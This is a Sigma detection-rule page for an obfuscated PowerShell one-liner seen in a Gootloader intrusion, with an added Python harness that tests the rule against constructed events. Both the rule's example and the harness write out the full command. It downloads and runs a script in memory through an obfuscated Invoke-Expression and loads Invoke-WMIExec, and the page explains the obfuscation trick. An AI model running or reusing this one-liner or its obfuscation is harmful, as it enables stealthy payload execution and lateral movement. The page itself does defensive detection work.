Obfuscated PowerShell OneLiner Execution
Detects the execution of a specific PowerShell one-liner that downloads a script with Invoke-RestMethod (IRM) and runs it in memory through an obfuscated Invoke-Expression, as observed in the Gootloader intrusion referenced below. The `"".SubString.ToString()[67,72,64]-Join""` construct indexes the overload-description string of String.Substring ("string Substring(int startIndex), string Substring(int startIndex, int length)") to assemble the token `iex` without it ever appearing on the command line, so the rule keys on the surrounding `%{(IRM $_)}` pipeline fragment, the hard-coded loopback URL and an `Invoke` token rather than on `IEX` itself. Note that the Image filter only covers `\powershell.exe`; the same one-liner launched through `pwsh.exe` will not trigger it, and the `http://127.0.0.1` string ties the rule tightly to the tooling in the referenced gist.
Sigma rule
title: Obfuscated PowerShell OneLiner Execution
id: 44e24481-6202-4c62-9127-5a0ae8e3fe3d
status: test
description: Detects the execution of a specific OneLiner to download and execute powershell modules in memory.
references:
    - https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/
    - https://gist.github.com/mgeeky/3b11169ab77a7de354f4111aa2f0df38
author: '@Kostastsale, TheDFIRReport'
date: 2022-05-09
modified: 2025-04-16
tags:
    - attack.defense-evasion
    - attack.execution
    - attack.t1059.001
    - attack.t1562.001
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        # Example: powershell -nop -noni -ep bypass -w h -c "$u=("http://127.0.0.1:1337/"|%%{(IRM $_)});&("".SubString.ToString()[67,72,64]-Join"")($u); Import-Module C:\Users\EXAMPLE\Invoke-WMIExec.ps1; Invoke-WMIExec"
        Image|endswith: '\powershell.exe'
        CommandLine|contains|all:
            - 'http://127.0.0.1'
            - '%{(IRM $_)}'
            - 'Invoke'
    condition: selection
falsepositives:
    - Unknown
level: high
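To make the matching semantics of the selection above concrete, the following is an added example (not code from the Sigma project or from the rule author) that evaluates the rule's `selection` block over a few constructed process_creation events. It implements only the Sigma string modifiers this rule uses (`endswith`, `contains`, `all`) with Sigma's default case-insensitive matching, and deliberately includes two near-misses a practitioner should know about: the same payload launched through `pwsh.exe`, and a benign `Invoke-RestMethod` call to loopback that lacks the `%{(IRM $_)}` pipeline fragment. The events, paths and command lines are constructed for the example; the sample one-liner uses the single-`%` form that the rule's selection string matches on.

```python
"""Evaluate the 'Obfuscated PowerShell OneLiner Execution' selection against
constructed process_creation events. Added example; not the Sigma project's
own code. Only the modifiers this rule needs are implemented."""

# The rule's selection block, transcribed field-for-field from the YAML above.
SELECTION = {
    "Image|endswith": r"\powershell.exe",
    "CommandLine|contains|all": [
        "http://127.0.0.1",
        "%{(IRM $_)}",
        "Invoke",
    ],
}

# Constructed command line in the shape of the rule's example comment (single '%').
EXAMPLE_CMD = (
    'powershell -nop -noni -ep bypass -w h -c "$u=("http://127.0.0.1:1337/"|%{(IRM $_)});'
    '&("".SubString.ToString()[67,72,64]-Join"")($u); '
    'Import-Module C:\\Users\\EXAMPLE\\Invoke-WMIExec.ps1; Invoke-WMIExec"'
)

# Constructed sample events (assumed field names match Sigma's process_creation taxonomy).
EVENTS = [
    {   # 1. the one-liner itself, run by Windows PowerShell: should match
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": EXAMPLE_CMD,
    },
    {   # 2. benign loopback call: has the URL and an 'Invoke' token but no pipeline fragment
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell -c "Invoke-RestMethod http://127.0.0.1:8080/health"',
    },
    {   # 3. identical payload under PowerShell 7: Image filter does not cover pwsh.exe
        "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
        "CommandLine": EXAMPLE_CMD.replace("powershell", "pwsh", 1),
    },
    {   # 4. the cmd.exe wrapper that spawned it: the child powershell.exe event is what matches
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd /c " + EXAMPLE_CMD,
    },
]


def field_matches(event, key, expected):
    """Apply one 'field|modifier|...' entry of a Sigma selection to an event.

    Sigma string comparisons are case-insensitive by default, so both sides are
    lower-cased. 'all' switches the list combination from any() to all().
    """
    field, *modifiers = key.split("|")
    actual = str(event.get(field, "")).lower()
    values = expected if isinstance(expected, list) else [expected]
    values = [str(v).lower() for v in values]

    if "endswith" in modifiers:
        test = actual.endswith
    elif "startswith" in modifiers:
        test = actual.startswith
    elif "contains" in modifiers:
        test = lambda v: v in actual  # noqa: E731
    else:
        test = lambda v: actual == v  # noqa: E731

    combine = all if "all" in modifiers else any
    return combine(test(v) for v in values)


def selection_matches(event, selection):
    """A Sigma selection is a map: every key must match (implicit AND)."""
    return all(field_matches(event, key, value) for key, value in selection.items())


def evaluate(events, selection=SELECTION):
    """Return one boolean per event: did the rule's selection fire?"""
    return [selection_matches(e, selection) for e in events]


if __name__ == "__main__":
    for event, hit in zip(EVENTS, evaluate(EVENTS)):
        print(f"{'ALERT' if hit else '  -  '}  {event['Image']}")
```

Only the first event fires. Event 3 shows the coverage gap noted in the description: if PowerShell 7 is deployed in the environment, add `'\pwsh.exe'` as a second `Image|endswith` value (a local tuning decision, not part of the published rule). Event 4 shows why the rule is anchored on the PowerShell process rather than its parent: the cmd.exe launcher is a separate process_creation event and does not match on its own.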
Related rules
- Custom Cobalt Strike Command Execution
- Potential BlackByte Ransomware Activity
- HackTool - Stracciatella Execution
- Remote Thread Creation Via PowerShell In Uncommon Target
- AMSI Bypass Pattern Assembly GetType